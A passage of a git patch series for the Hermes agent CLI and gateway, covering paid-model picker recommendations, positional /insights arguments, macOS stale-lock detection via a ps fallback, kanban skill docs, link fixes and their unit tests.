+        name = _extract_model_name(entry)
+        if name:
+            portal_paid_ids.append(name)
+    if not portal_paid_ids:
+        return (list(curated_ids), dict(pricing))
+
+    augmented_ids = list(curated_ids)
+    seen = set(augmented_ids)
+    # Prepend Portal paid recommendations that aren't already curated, so
+    # the Portal-blessed picks surface first in the picker.
+    new_ones = [mid for mid in portal_paid_ids if mid not in seen]
+    if new_ones:
+        augmented_ids = new_ones + augmented_ids
+
+    return (augmented_ids, dict(pricing))
+
+
 # ---------------------------------------------------------------------------
 # TTL cache for free-tier detection — avoids repeated API calls within a
 # session while still picking up upgrades quickly.
diff --git a/tests/hermes_cli/test_models.py b/tests/hermes_cli/test_models.py
index 668105bf10d..8ccf5b57f2d 100644
--- a/tests/hermes_cli/test_models.py
+++ b/tests/hermes_cli/test_models.py
@@ -7,6 +7,7 @@ from hermes_cli.models import (
     is_nous_free_tier, partition_nous_models_by_tier,
     check_nous_free_tier, _FREE_TIER_CACHE_TTL,
     union_with_portal_free_recommendations,
+    union_with_portal_paid_recommendations,
 )
 import hermes_cli.models as _models_mod
 
@@ -506,6 +507,147 @@ class TestUnionWithPortalFreeRecommendations:
         assert p["qwen/qwen3.6-plus"] == self._FREE
 
 
+class TestUnionWithPortalPaidRecommendations:
+    """Tests for union_with_portal_paid_recommendations.
+
+    Mirror of TestUnionWithPortalFreeRecommendations: the Portal's
+    paidRecommendedModels endpoint is the source of truth for what's a
+    blessed paid model *right now*. The in-repo curated list and
+    docs-hosted manifest can lag — this helper guarantees newly-launched
+    paid models surface in the picker for paid-tier users without a CLI
+    release.
+    """
+
+    _PAID = {"prompt": "0.000003", "completion": "0.000015"}
+    _FREE = {"prompt": "0", "completion": "0"}
+
+    def _payload(self, paid_models: list[str]) -> dict:
+        return {
+            "paidRecommendedModels": [
+                {"modelName": mid, "displayName": mid} for mid in paid_models
+            ],
+        }
+
+    def test_adds_portal_paid_model_missing_from_curated(self):
+        """A Portal-advertised paid model not in curated is prepended."""
+        curated = ["anthropic/claude-opus-4.6"]
+        pricing = {"anthropic/claude-opus-4.6": self._PAID}
+        with patch(
+            "hermes_cli.models.fetch_nous_recommended_models",
+            return_value=self._payload(["openai/gpt-5.4"]),
+        ):
+            ids, p = union_with_portal_paid_recommendations(curated, pricing, "")
+
+        assert ids[0] == "openai/gpt-5.4"  # prepended
+        assert "anthropic/claude-opus-4.6" in ids
+        # Existing pricing untouched
+        assert p["anthropic/claude-opus-4.6"] == self._PAID
+
+    def test_does_not_synthesize_pricing_for_paid_models(self):
+        """Paid recommendations missing from live pricing get no synthetic entry.
+
+        Synthesizing zero pricing (like the free helper does) would mislead
+        :func:`partition_nous_models_by_tier` into treating them as free;
+        synthesizing a non-zero placeholder would lie to the user. The
+        right thing is to leave pricing absent so the picker shows a blank
+        column until the live pricing endpoint catches up.
+        """
+        curated = ["anthropic/claude-opus-4.6"]
+        pricing = {"anthropic/claude-opus-4.6": self._PAID}
+        with patch(
+            "hermes_cli.models.fetch_nous_recommended_models",
+            return_value=self._payload(["openai/gpt-5.4"]),
+        ):
+            _, p = union_with_portal_paid_recommendations(curated, pricing, "")
+
+        assert "openai/gpt-5.4" not in p
+        assert p["anthropic/claude-opus-4.6"] == self._PAID
+
+    def test_does_not_duplicate_curated_entries(self):
+        """A Portal paid model already in curated is not duplicated."""
+        curated = ["openai/gpt-5.4", "anthropic/claude-opus-4.6"]
+        pricing = {
+            "openai/gpt-5.4": self._PAID,
+            "anthropic/claude-opus-4.6": self._PAID,
+        }
+        with patch(
+            "hermes_cli.models.fetch_nous_recommended_models",
+            return_value=self._payload(["openai/gpt-5.4"]),
+        ):
+            ids, p = union_with_portal_paid_recommendations(curated, pricing, "")
+
+        assert ids == curated
+        assert p == pricing
+
+    def test_empty_payload_returns_inputs_unchanged(self):
+        """Empty Portal response leaves curated + pricing untouched."""
+        curated = ["a", "b"]
+        pricing = {"a": self._PAID}
+        with patch("hermes_cli.models.fetch_nous_recommended_models", return_value={}):
+            ids, p = union_with_portal_paid_recommendations(curated, pricing, "")
+        assert ids == curated
+        assert p == pricing
+
+    def test_missing_paidRecommendedModels_key(self):
+        """Portal payload without paidRecommendedModels degrades gracefully."""
+        curated = ["a"]
+        pricing = {"a": self._PAID}
+        with patch(
+            "hermes_cli.models.fetch_nous_recommended_models",
+            return_value={"freeRecommendedModels": [{"modelName": "x"}]},
+        ):
+            ids, p = union_with_portal_paid_recommendations(curated, pricing, "")
+        assert ids == curated
+        assert p == pricing
+
+    def test_fetch_failure_returns_inputs(self):
+        """Network failures don't blow up the picker."""
+        curated = ["a"]
+        pricing = {"a": self._PAID}
+        with patch(
+            "hermes_cli.models.fetch_nous_recommended_models",
+            side_effect=RuntimeError("network down"),
+        ):
+            ids, p = union_with_portal_paid_recommendations(curated, pricing, "")
+        assert ids == curated
+        assert p == pricing
+
+    def test_invalid_entries_skipped(self):
+        """Non-dict / missing-modelName entries are filtered out."""
+        curated = ["a"]
+        pricing = {"a": self._PAID}
+        with patch(
+            "hermes_cli.models.fetch_nous_recommended_models",
+            return_value={
+                "paidRecommendedModels": [
+                    "not-a-dict",
+                    {"displayName": "no-modelName"},
+                    {"modelName": ""},
+                    {"modelName": "openai/gpt-5.4"},
+                ]
+            },
+        ):
+            ids, p = union_with_portal_paid_recommendations(curated, pricing, "")
+        assert ids == ["openai/gpt-5.4", "a"]
+        # No synthetic entry — pricing is untouched.
+        assert "openai/gpt-5.4" not in p
+
+    def test_preserves_relative_order_of_new_paid_models(self):
+        """Multiple new paid models are prepended in payload order."""
+        curated = ["anthropic/claude-opus-4.6"]
+        pricing = {"anthropic/claude-opus-4.6": self._PAID}
+        with patch(
+            "hermes_cli.models.fetch_nous_recommended_models",
+            return_value=self._payload(["openai/gpt-5.4", "openai/gpt-5.5"]),
+        ):
+            ids, _ = union_with_portal_paid_recommendations(curated, pricing, "")
+        assert ids == [
+            "openai/gpt-5.4",
+            "openai/gpt-5.5",
+            "anthropic/claude-opus-4.6",
+        ]
+
+
 class TestCheckNousFreeTierCache:
     """Tests for the TTL cache on check_nous_free_tier()."""
 

From a34998ee2fc39ae7009abd1340082400ef21c08f Mon Sep 17 00:00:00 2001
From: helix4u <4317663+helix4u@users.noreply.github.com>
Date: Tue, 12 May 2026 10:23:43 -0600
Subject: [PATCH 16/59] fix(cli): parse positional insights days

---
 cli.py                                 |  3 ++
 tests/cli/test_cli_insights_command.py | 43 ++++++++++++++++++++++++++
 2 files changed, 46 insertions(+)
 create mode 100644 tests/cli/test_cli_insights_command.py

diff --git a/cli.py b/cli.py
index ea167b6b411..0666d74ba58 100644
--- a/cli.py
+++ b/cli.py
@@ -8805,6 +8805,9 @@ class HermesCLI:
             elif parts[i] == "--source" and i + 1 < len(parts):
                 source = parts[i + 1]
                 i += 2
+            elif parts[i].isdigit():
+                days = int(parts[i])
+                i += 1
             else:
                 i += 1
 
diff --git a/tests/cli/test_cli_insights_command.py b/tests/cli/test_cli_insights_command.py
new file mode 100644
index 00000000000..66c3c73b5d8
--- /dev/null
+++ b/tests/cli/test_cli_insights_command.py
@@ -0,0 +1,43 @@
+from unittest.mock import MagicMock, patch
+
+from cli import HermesCLI
+
+
+class _InsightsEngineStub:
+    calls = []
+
+    def __init__(self, db):
+        self.db = db
+
+    def generate(self, *, days=30, source=None):
+        self.calls.append({"days": days, "source": source})
+        return {"days": days, "source": source}
+
+    def format_terminal(self, report):
+        return f"days={report['days']} source={report['source']}"
+
+
+def _run_show_insights(command: str):
+    cli_obj = HermesCLI.__new__(HermesCLI)
+    db = MagicMock()
+    _InsightsEngineStub.calls = []
+    with patch("hermes_state.SessionDB", return_value=db), \
+         patch("agent.insights.InsightsEngine", _InsightsEngineStub):
+        cli_obj._show_insights(command)
+    return _InsightsEngineStub.calls, db
+
+
+def test_cli_insights_accepts_positional_days(capsys):
+    calls, db = _run_show_insights("/insights 7")
+
+    assert calls == [{"days": 7, "source": None}]
+    db.close.assert_called_once()
+    assert "days=7 source=None" in capsys.readouterr().out
+
+
+def test_cli_insights_keeps_days_flag_and_source(capsys):
+    calls, db = _run_show_insights("/insights --days 14 --source discord")
+
+    assert calls == [{"days": 14, "source": "discord"}]
+    db.close.assert_called_once()
+    assert "days=14 source=discord" in capsys.readouterr().out

From 653d30429039d1f5f048889e5397c1297c1fda38 Mon Sep 17 00:00:00 2001
From: Preetham Kyanam <kyanam.preetham@gmail.com>
Date: Mon, 11 May 2026 14:37:37 -0400
Subject: [PATCH 17/59] fix(gateway): detect stale scoped locks via cmdline
 when start_time is absent on macOS
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

On macOS (and Windows), /proc is unavailable so _get_process_start_time()
always returns None. When a gateway creates a scoped lock record with
start_time=None and then exits, macOS can reuse that PID for an unrelated
process. On restart, acquire_scoped_lock() sees:

  1. os.kill(pid, 0) succeeds (PID is alive — but it's bluetoothuserd, not
     the gateway)
  2. existing.start_time is None and current_start is None, so the
     start_time comparison is inconclusive
  3. The lock is treated as active, blocking gateway startup with:
     "Telegram bot token already in use (PID 873). Stop the other gateway
     first."

Root cause: _read_process_cmdline() only reads /proc/<pid>/cmdline, which
doesn't exist on macOS. It always returns None, making
_looks_like_gateway_process() always return False, so the cmdline fallback
path in acquire_scoped_lock() was unreachable on macOS.

Fix (two parts):

1. _read_process_cmdline(): Add a ps(1) fallback for platforms without
   /proc. When /proc/<pid>/cmdline doesn't exist, we now run
   "ps -p <pid> -o command=" to retrieve the process command line. The
   /proc path is tried first (preserving Linux performance); ps is only
   invoked as a fallback.

2. acquire_scoped_lock(): When both the lock record's start_time and the
   live process's start_time are None (the macOS case), fall back to
   checking whether the live PID still looks like a Hermes gateway process
   via _looks_like_gateway_process(). If it doesn't, the lock is stale.

Closes #16376
---
 gateway/status.py            | 38 +++++++++++++--
 tests/gateway/test_status.py | 93 ++++++++++++++++++++++++++++++++++++
 2 files changed, 126 insertions(+), 5 deletions(-)

diff --git a/gateway/status.py b/gateway/status.py
index 2849e775080..0cc8abddb47 100644
--- a/gateway/status.py
+++ b/gateway/status.py
@@ -124,16 +124,33 @@ def get_process_start_time(pid: int) -> Optional[int]:
 
 
 def _read_process_cmdline(pid: int) -> Optional[str]:
-    """Return the process command line as a space-separated string."""
+    """Return the process command line as a space-separated string.
+
+    On Linux, reads /proc/<pid>/cmdline directly.  On macOS and other
+    platforms without /proc, falls back to ``ps -p <pid> -o command=``.
+    """
     cmdline_path = Path(f"/proc/{pid}/cmdline")
     try:
         raw = cmdline_path.read_bytes()
     except (FileNotFoundError, PermissionError, OSError):
-        return None
+        pass
+    else:
+        if raw:
+            return raw.replace(b"\x00", b" ").decode("utf-8", errors="ignore").strip()
 
-    if not raw:
-        return None
-    return raw.replace(b"\x00", b" ").decode("utf-8", errors="ignore").strip()
+    try:
+        result = subprocess.run(
+            ["ps", "-p", str(pid), "-o", "command="],
+            capture_output=True,
+            text=True,
+            timeout=5,
+        )
+        if result.returncode == 0 and result.stdout.strip():
+            return result.stdout.strip()
+    except (OSError, subprocess.TimeoutExpired):
+        pass
+
+    return None
 
 
 def _looks_like_gateway_process(pid: int) -> bool:
@@ -594,6 +611,17 @@ def acquire_scoped_lock(scope: str, identity: str, metadata: Optional[dict[str,
                     and current_start != existing.get("start_time")
                 ):
                     stale = True
+                # When start_time comparison is unavailable (macOS / Windows
+                # have no /proc, so both sides are None), fall back to
+                # checking the live process command line.  If the PID was
+                # reused by an unrelated process the lock is stale.
+                if (
+                    not stale
+                    and existing.get("start_time") is None
+                    and current_start is None
+                    and not _looks_like_gateway_process(existing_pid)
+                ):
+                    stale = True
                 # Check if process is stopped (Ctrl+Z / SIGTSTP) — stopped
                 # processes still appear alive to _pid_exists but are not
                 # actually running. Treat them as stale so --replace works.
diff --git a/tests/gateway/test_status.py b/tests/gateway/test_status.py
index 3eed29758d7..8a603260205 100644
--- a/tests/gateway/test_status.py
+++ b/tests/gateway/test_status.py
@@ -444,6 +444,56 @@ class TestScopedLocks:
         assert acquired is False
         assert existing["pid"] == 99999
 
+    def test_acquire_scoped_lock_replaces_pid_reused_by_unrelated_process(self, tmp_path, monkeypatch):
+        """macOS regression: PID reused by an unrelated process with start_time=None.
+
+        On macOS /proc is unavailable, so both the lock record and the live
+        process report start_time=None.  The live PID is alive (os.kill
+        succeeds) but belongs to a completely different program.  The lock
+        must be treated as stale.
+        """
+        monkeypatch.setenv("HERMES_GATEWAY_LOCK_DIR", str(tmp_path / "locks"))
+        lock_path = tmp_path / "locks" / "telegram-bot-token-2bb80d537b1da3e3.lock"
+        lock_path.parent.mkdir(parents=True, exist_ok=True)
+        lock_path.write_text(json.dumps({
+            "pid": 873,
+            "start_time": None,
+            "kind": "hermes-gateway",
+            "argv": ["/Users/user/.hermes/hermes-agent/hermes_cli/main.py", "gateway", "run", "--replace"],
+        }))
+
+        monkeypatch.setattr(status.os, "kill", lambda pid, sig: None)
+        monkeypatch.setattr(status, "_get_process_start_time", lambda pid: None)
+        monkeypatch.setattr(status, "_looks_like_gateway_process", lambda pid: False)
+
+        acquired, existing = status.acquire_scoped_lock("telegram-bot-token", "secret", metadata={"platform": "telegram"})
+
+        assert acquired is True
+        payload = json.loads(lock_path.read_text())
+        assert payload["pid"] == os.getpid()
+        assert payload["metadata"]["platform"] == "telegram"
+
+    def test_acquire_scoped_lock_keeps_lock_when_pid_reused_by_gateway(self, tmp_path, monkeypatch):
+        """When start_time is None but the live PID still looks like a gateway, keep the lock."""
+        monkeypatch.setenv("HERMES_GATEWAY_LOCK_DIR", str(tmp_path / "locks"))
+        lock_path = tmp_path / "locks" / "telegram-bot-token-2bb80d537b1da3e3.lock"
+        lock_path.parent.mkdir(parents=True, exist_ok=True)
+        lock_path.write_text(json.dumps({
+            "pid": 99999,
+            "start_time": None,
+            "kind": "hermes-gateway",
+            "argv": ["/Users/user/.hermes/hermes-agent/hermes_cli/main.py", "gateway", "run", "--replace"],
+        }))
+
+        monkeypatch.setattr(status.os, "kill", lambda pid, sig: None)
+        monkeypatch.setattr(status, "_get_process_start_time", lambda pid: None)
+        monkeypatch.setattr(status, "_looks_like_gateway_process", lambda pid: True)
+
+        acquired, existing = status.acquire_scoped_lock("telegram-bot-token", "secret", metadata={"platform": "telegram"})
+
+        assert acquired is False
+        assert existing["pid"] == 99999
+
     def test_acquire_scoped_lock_replaces_stale_record(self, tmp_path, monkeypatch):
         monkeypatch.setenv("HERMES_GATEWAY_LOCK_DIR", str(tmp_path / "locks"))
         lock_path = tmp_path / "locks" / "telegram-bot-token-2bb80d537b1da3e3.lock"
@@ -811,3 +861,46 @@ class TestPlannedStopMarker:
         ok = status.write_planned_stop_marker(target_pid=12345)
 
         assert ok is False
+
+
+class TestReadProcessCmdlinePsFallback:
+    """Tests for _read_process_cmdline falling back to ps on non-Linux."""
+
+    def test_ps_fallback_when_proc_unavailable(self, monkeypatch):
+        monkeypatch.setattr(status.Path, "read_bytes", lambda self: (_ for _ in ()).throw(FileNotFoundError))
+        monkeypatch.setattr(
+            status.subprocess, "run",
+            lambda args, **kwargs: SimpleNamespace(returncode=0, stdout="/usr/libexec/bluetoothuserd\n"),
+        )
+        result = status._read_process_cmdline(873)
+        assert result == "/usr/libexec/bluetoothuserd"
+
+    def test_ps_fallback_returns_none_on_failure(self, monkeypatch):
+        monkeypatch.setattr(status.Path, "read_bytes", lambda self: (_ for _ in ()).throw(FileNotFoundError))
+        monkeypatch.setattr(
+            status.subprocess, "run",
+            lambda args, **kwargs: SimpleNamespace(returncode=1, stdout=""),
+        )
+        result = status._read_process_cmdline(99999)
+        assert result is None
+
+    def test_proc_cmdline_takes_priority_over_ps(self, monkeypatch):
+        calls = []
+
+        def fake_read_bytes(self):
+            calls.append("proc")
+            return b"python\x00hermes_cli/main.py\x00gateway\x00"
+
+        monkeypatch.setattr(status.Path, "read_bytes", fake_read_bytes)
+        result = status._read_process_cmdline(12345)
+        assert "hermes_cli/main.py" in result
+        assert calls == ["proc"]
+
+    def test_ps_fallback_used_when_proc_returns_empty(self, monkeypatch):
+        monkeypatch.setattr(status.Path, "read_bytes", lambda self: b"")
+        monkeypatch.setattr(
+            status.subprocess, "run",
+            lambda args, **kwargs: SimpleNamespace(returncode=0, stdout="python hermes_cli/main.py gateway run\n"),
+        )
+        result = status._read_process_cmdline(12345)
+        assert "hermes_cli/main.py" in result

From 629c33c633a12e43e9a334fbd07a973b317c950e Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 11:51:37 -0700
Subject: [PATCH 18/59] test(gateway): patch _pid_exists instead of os.kill for
 scoped-lock tests
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Post-#21561 the liveness probe in acquire_scoped_lock() routes through
gateway.status._pid_exists (psutil-first, safe on Windows), not
os.kill(pid, 0). The two new macOS regression tests were patching
status.os.kill, which had no effect — the unmocked psutil call returned
False for PID 99999, marking the lock stale before the new code branch
ran. The 'replaces' test passed only because acquired=True was already
the expected outcome; the 'keeps' test failed in CI.

Switch both tests to monkeypatch status._pid_exists directly, matching
the existing test_acquire_scoped_lock_rejects_live_other_process pattern,
so they actually exercise the new start_time=None + cmdline-based
staleness branch.
---
 tests/gateway/test_status.py | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/tests/gateway/test_status.py b/tests/gateway/test_status.py
index 8a603260205..91a52104ded 100644
--- a/tests/gateway/test_status.py
+++ b/tests/gateway/test_status.py
@@ -462,7 +462,10 @@ class TestScopedLocks:
             "argv": ["/Users/user/.hermes/hermes-agent/hermes_cli/main.py", "gateway", "run", "--replace"],
         }))
 
-        monkeypatch.setattr(status.os, "kill", lambda pid, sig: None)
+        # Post-#21561 the liveness probe routes through
+        # ``gateway.status._pid_exists`` (psutil-first, safe on Windows),
+        # not ``os.kill``.
+        monkeypatch.setattr(status, "_pid_exists", lambda pid: True)
         monkeypatch.setattr(status, "_get_process_start_time", lambda pid: None)
         monkeypatch.setattr(status, "_looks_like_gateway_process", lambda pid: False)
 
@@ -485,7 +488,7 @@ class TestScopedLocks:
             "argv": ["/Users/user/.hermes/hermes-agent/hermes_cli/main.py", "gateway", "run", "--replace"],
         }))
 
-        monkeypatch.setattr(status.os, "kill", lambda pid, sig: None)
+        monkeypatch.setattr(status, "_pid_exists", lambda pid: True)
         monkeypatch.setattr(status, "_get_process_start_time", lambda pid: None)
         monkeypatch.setattr(status, "_looks_like_gateway_process", lambda pid: True)
 

From 954e854ccc47ab567fcf9adc1babf20f4540de02 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 11:52:44 -0700
Subject: [PATCH 19/59] =?UTF-8?q?chore(release):=20map=20kyanam.preetham@g?=
 =?UTF-8?q?mail.com=20=E2=86=92=20pkyanam?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 scripts/release.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/scripts/release.py b/scripts/release.py
index 768a79a4833..c6bb053e2e4 100755
--- a/scripts/release.py
+++ b/scripts/release.py
@@ -58,6 +58,7 @@ AUTHOR_MAP = {
     "hirokazu.ogawa@kwansei.ac.jp": "hrkzogw",
     "datapod.k@gmail.com": "dandacompany",
     "treydong.zh@gmail.com": "TreyDong",
+    "kyanam.preetham@gmail.com": "pkyanam",
     "127238744+teknium1@users.noreply.github.com": "teknium1",
     "hugosequier@gmail.com": "Hugo-SEQUIER",
     "128259593+Gutslabs@users.noreply.github.com": "Gutslabs",

From 71198b9e19d25daf5dbdecf6f99e90cc342f045d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=A2=A8=E7=B6=A0BG?= <s5460703@gmail.com>
Date: Tue, 12 May 2026 21:58:13 +0800
Subject: [PATCH 20/59] =?UTF-8?q?=F0=9F=93=9D=20docs(kanban):=20clarify=20?=
 =?UTF-8?q?dependent=20task=20gating?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 skills/devops/kanban-orchestrator/SKILL.md                   | 5 ++++-
 .../skills/bundled/devops/devops-kanban-orchestrator.md      | 5 ++++-
 2 files changed, 8 insertions(+), 2 deletions(-)

diff --git a/skills/devops/kanban-orchestrator/SKILL.md b/skills/devops/kanban-orchestrator/SKILL.md
index b444686a331..25f634205c8 100644
--- a/skills/devops/kanban-orchestrator/SKILL.md
+++ b/skills/devops/kanban-orchestrator/SKILL.md
@@ -50,6 +50,7 @@ Your job description says "route, don't execute." The rules that enforce that:
 - **For any concrete task, create a Kanban task and assign it.** Every single time.
 - **Split multi-lane requests before creating cards.** A user prompt can contain several independent workstreams. Extract those lanes first, then create one card per lane instead of bundling unrelated work into a single implementer card.
 - **Run independent lanes in parallel.** If two cards do not need each other's output, leave them unlinked so the dispatcher can fan them out. Link only true data dependencies.
+- **Never create dependent work as independent ready cards.** If a card must wait for another card, pass `parents=[...]` in the original `kanban_create` call. Do not create it first and link it later, and do not rely on prose like "wait for T1" inside the body.
 - **If no specialist fits the available profiles, ask the user which profile to create or which existing profile to use.** Do not invent profile names; the dispatcher will silently drop unknown assignees.
 - **Decompose, route, and summarize — that's the whole job.**
 
@@ -67,7 +68,7 @@ Before creating anything, draft the graph out loud (in your response to the user
 2. Map each lane to one of the profiles you discovered in Step 0. If a lane doesn't fit any existing profile, ask the user which to use or create.
 3. Decide whether each lane is independent or gated by another lane.
 4. Create independent lanes as parallel cards with no parent links.
-5. Create synthesis/review/integration cards with parent links to the lanes they depend on.
+5. Create synthesis/review/integration cards with parent links to the lanes they depend on. A child created with unfinished parents starts in `todo`; the dispatcher promotes it to `ready` only after every parent is done.
 
 Examples of prompts that should fan out (using placeholder profile names — substitute whatever exists on the user's setup):
 
@@ -115,6 +116,8 @@ t4 = kanban_create(
 
 `parents=[...]` gates promotion — children stay in `todo` until every parent reaches `done`, then auto-promote to `ready`. No manual coordination needed; the dispatcher and dependency engine handle it.
 
+If the task graph has dependencies, create the parent cards first, capture their returned ids, and include those ids in the child card's `parents` list during the child `kanban_create` call. Avoid creating all cards in parallel and linking them afterward; that creates a window where the dispatcher can claim a child before its inputs exist.
+
 ### Step 4 — Complete your own task
 
 If you were spawned as a task yourself (e.g. a planner profile was assigned `T0: "investigate Postgres migration"`), mark it done with a summary of what you created:
diff --git a/website/docs/user-guide/skills/bundled/devops/devops-kanban-orchestrator.md b/website/docs/user-guide/skills/bundled/devops/devops-kanban-orchestrator.md
index 6dc92bb41f9..be60ff79733 100644
--- a/website/docs/user-guide/skills/bundled/devops/devops-kanban-orchestrator.md
+++ b/website/docs/user-guide/skills/bundled/devops/devops-kanban-orchestrator.md
@@ -68,6 +68,7 @@ Your job description says "route, don't execute." The rules that enforce that:
 - **For any concrete task, create a Kanban task and assign it.** Every single time.
 - **Split multi-lane requests before creating cards.** A user prompt can contain several independent workstreams. Extract those lanes first, then create one card per lane instead of bundling unrelated work into a single implementer card.
 - **Run independent lanes in parallel.** If two cards do not need each other's output, leave them unlinked so the dispatcher can fan them out. Link only true data dependencies.
+- **Never create dependent work as independent ready cards.** If a card must wait for another card, pass `parents=[...]` in the original `kanban_create` call. Do not create it first and link it later, and do not rely on prose like "wait for T1" inside the body.
 - **If no specialist fits the available profiles, ask the user which profile to create or which existing profile to use.** Do not invent profile names; the dispatcher will silently drop unknown assignees.
 - **Decompose, route, and summarize — that's the whole job.**
 
@@ -85,7 +86,7 @@ Before creating anything, draft the graph out loud (in your response to the user
 2. Map each lane to one of the profiles you discovered in Step 0. If a lane doesn't fit any existing profile, ask the user which to use or create.
 3. Decide whether each lane is independent or gated by another lane.
 4. Create independent lanes as parallel cards with no parent links.
-5. Create synthesis/review/integration cards with parent links to the lanes they depend on.
+5. Create synthesis/review/integration cards with parent links to the lanes they depend on. A child created with unfinished parents starts in `todo`; the dispatcher promotes it to `ready` only after every parent is done.
 
 Examples of prompts that should fan out (using placeholder profile names — substitute whatever exists on the user's setup):
 
@@ -133,6 +134,8 @@ t4 = kanban_create(
 
 `parents=[...]` gates promotion — children stay in `todo` until every parent reaches `done`, then auto-promote to `ready`. No manual coordination needed; the dispatcher and dependency engine handle it.
 
+If the task graph has dependencies, create the parent cards first, capture their returned ids, and include those ids in the child card's `parents` list during the child `kanban_create` call. Avoid creating all cards in parallel and linking them afterward; that creates a window where the dispatcher can claim a child before its inputs exist.
+
 ### Step 4 — Complete your own task
 
 If you were spawned as a task yourself (e.g. a planner profile was assigned `T0: "investigate Postgres migration"`), mark it done with a summary of what you created:

From 1189ed785504fd599b520561e0fb3dbc46a45f66 Mon Sep 17 00:00:00 2001
From: luarss <39641663+luarss@users.noreply.github.com>
Date: Tue, 12 May 2026 15:02:35 -0700
Subject: [PATCH 21/59] fix(docs): correct broken internal links to webhooks
 and mlops skill pages

- cron-script-only: webhook subscription links pointed to
  /docs/user-guide/features/webhooks; the page lives under messaging/
- mlops-hermes-atropos-environments: axolotl and TRL related-skill links
  pointed to skills/bundled/mlops/; both files live under skills/optional/mlops/

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 website/docs/guides/cron-script-only.md                       | 4 ++--
 .../optional/mlops/mlops-hermes-atropos-environments.md       | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/website/docs/guides/cron-script-only.md b/website/docs/guides/cron-script-only.md
index 5863412f565..247ebc2beee 100644
--- a/website/docs/guides/cron-script-only.md
+++ b/website/docs/guides/cron-script-only.md
@@ -233,7 +233,7 @@ Silent when both filesystems are under 90%; fires exactly one line per over-thre
 |----------|-----------|-------------|
 | `cronjob --no-agent` (this page) | Your script on Hermes' schedule | Recurring watchdogs / alerts / metrics that don't need reasoning |
 | `cronjob` (default, LLM) | Agent with optional pre-check script | When the message content requires reasoning over data |
-| OS cron + `curl` to a [webhook subscription](/docs/user-guide/features/webhooks) | Your script on the OS schedule | When Hermes might be unhealthy (the thing you're monitoring) |
+| OS cron + `curl` to a [webhook subscription](/docs/user-guide/messaging/webhooks) | Your script on the OS schedule | When Hermes might be unhealthy (the thing you're monitoring) |
 
 For critical system-health watchdogs that must fire *even when the gateway is down*, use OS-level cron with a plain `curl` to a Hermes webhook subscription (or any external alerting endpoint) — those run as independent OS processes and don't depend on Hermes being up. The in-gateway scheduler is the right choice when the thing being monitored is external.
 
@@ -241,5 +241,5 @@ For critical system-health watchdogs that must fire *even when the gateway is do
 
 - [Automate Anything with Cron](/docs/guides/automate-with-cron) — LLM-driven cron patterns.
 - [Scheduled Tasks (Cron) reference](/docs/user-guide/features/cron) — full schedule syntax, lifecycle, delivery routing.
-- [Webhook Subscriptions](/docs/user-guide/features/webhooks) — fire-and-forget HTTP entry points for external schedulers.
+- [Webhook Subscriptions](/docs/user-guide/messaging/webhooks) — fire-and-forget HTTP entry points for external schedulers.
 - [Gateway Internals](/docs/developer-guide/gateway-internals) — delivery-router internals.
diff --git a/website/docs/user-guide/skills/optional/mlops/mlops-hermes-atropos-environments.md b/website/docs/user-guide/skills/optional/mlops/mlops-hermes-atropos-environments.md
index 6ca3a9b29a3..7cce92a7e0e 100644
--- a/website/docs/user-guide/skills/optional/mlops/mlops-hermes-atropos-environments.md
+++ b/website/docs/user-guide/skills/optional/mlops/mlops-hermes-atropos-environments.md
@@ -21,7 +21,7 @@ Build, test, and debug Hermes Agent RL environments for Atropos training. Covers
 | License | MIT |
 | Platforms | linux, macos, windows |
 | Tags | `atropos`, `rl`, `environments`, `training`, `reinforcement-learning`, `reward-functions` |
-| Related skills | [`axolotl`](/docs/user-guide/skills/bundled/mlops/mlops-training-axolotl), [`fine-tuning-with-trl`](/docs/user-guide/skills/bundled/mlops/mlops-training-trl-fine-tuning), `lm-evaluation-harness` |
+| Related skills | [`axolotl`](/docs/user-guide/skills/optional/mlops/mlops-training-axolotl), [`fine-tuning-with-trl`](/docs/user-guide/skills/optional/mlops/mlops-training-trl-fine-tuning), `lm-evaluation-harness` |
 
 ## Reference: full SKILL.md
 

From 4fa5f7b765db86c4c4d87cbede6b6c21891acc74 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 15:03:00 -0700
Subject: [PATCH 22/59] chore(release): add AUTHOR_MAP entry for luarss

---
 scripts/release.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/scripts/release.py b/scripts/release.py
index c6bb053e2e4..04be23e4561 100755
--- a/scripts/release.py
+++ b/scripts/release.py
@@ -138,6 +138,7 @@ AUTHOR_MAP = {
     "tangyuanjc@JCdeAIfenshendeMac-mini.local": "tangyuanjc",
     "leon@agentlinker.ai": "agentlinker",
     "santoshhumagain1887@gmail.com": "npmisantosh",
+    "39641663+luarss@users.noreply.github.com": "luarss",
     "novax635@gmail.com": "novax635",
     "krionex1@gmail.com": "Krionex",
     "rxdxxxx@users.noreply.github.com": "rxdxxxx",

From 4bb0a82a2b8dc4d4fd952d977a81ae2ccbc52fbc Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ahmet=20O=C5=9Frak?= <ahmetosrak@Ahmet-MacBook-Air.local>
Date: Wed, 13 May 2026 00:56:32 +0300
Subject: [PATCH 23/59] fix(gateway): enqueue SSE EOS sentinel on task
 completion

---
 gateway/platforms/api_server.py  |  6 ++
 tests/gateway/test_api_server.py | 97 +++++++++++++++++++++++++++++++-
 2 files changed, 102 insertions(+), 1 deletion(-)

diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py
index 497adbd19c6..8b53db3a99f 100644
--- a/gateway/platforms/api_server.py
+++ b/gateway/platforms/api_server.py
